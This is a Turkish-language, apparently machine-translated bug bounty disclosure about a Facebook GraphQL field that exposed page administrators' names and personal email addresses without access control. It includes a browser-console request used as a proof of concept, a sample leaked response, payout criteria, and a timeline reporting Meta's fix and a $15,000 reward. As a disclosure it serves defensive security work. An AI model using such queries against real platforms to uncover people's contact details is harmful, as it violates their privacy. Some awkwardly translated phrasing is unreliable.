. AdsLeadGenLeadRetrievalEmailModalContainerQuery Graphql sorgusu bir alan var page_admins_with_manage_leads_access Üzerinde erişim kontrolü olmadan, bir Facebook sayfası yöneticisinin ve kişisel e -posta adreslerinin açıklanmasına yol açar.
1. Facebook.com’a “Saldırgan” olarak giriş yapın
2. Chrome geliştirici araçlarını açın ve bir GraphQL sorgusu için aşağıdaki komut dosyasını ekleyin
require("AsyncRequest"); new AsyncRequest('/api/graphql').setData({doc_id:'9184705044983547',variables:'{pageID:PAGEIDHERE}'}).send()
3. Yanıtı gözlemleyin
{"data":{"page":{"page_admins_with_manage_leads_access":[{"email_address":"victim\u0040tfbnw.net","id":"","name":"Victim"}],"id":""}},"extensions":{"is_final":true}}
Sayfa yöneticisi, Page_admins_with_manage_leads_access alanlarının yanı sıra “kurban” ile iletişim noktası (e -posta_address) aracılığıyla da açıklanır.
https://bugbounty.meta.com/payout-guidelines/page-admin/
- Sayfa yöneticisi yapmak Olumsuz Bir harekete geçmeniz gerekiyor
- Saldırgan yapmak Olumsuz ayrıcalıklı pozisyon gerektirir
- Kurulum faktörü/bir kerelik koşul yok
- Saldırgan yöneticiye karşı hiçbir işlem gerektirmez
https://bugbounty.meta.com/payout-guidelines/uii-to-uid
Bilinen bir kullanıcı kimliğine uygun e -posta veya telefon numarası gibi bir iletişim noktasını tanımlamayı etkinleştiren hatalar
Olmayan Video
Zaman çizelgesi
4 Mart 2025 – Rapor gönderildi
4 Mart 2025 – Meta tarafından triated raporu
23 Mar 2025 – Meta tarafından düzeltmenin teyidi
31 Mart 2025 – Meta tarafından azaltma sonrası soruşturmalar
7 Nisan 2025 – Meta tarafından verilen 15.000 $ ödül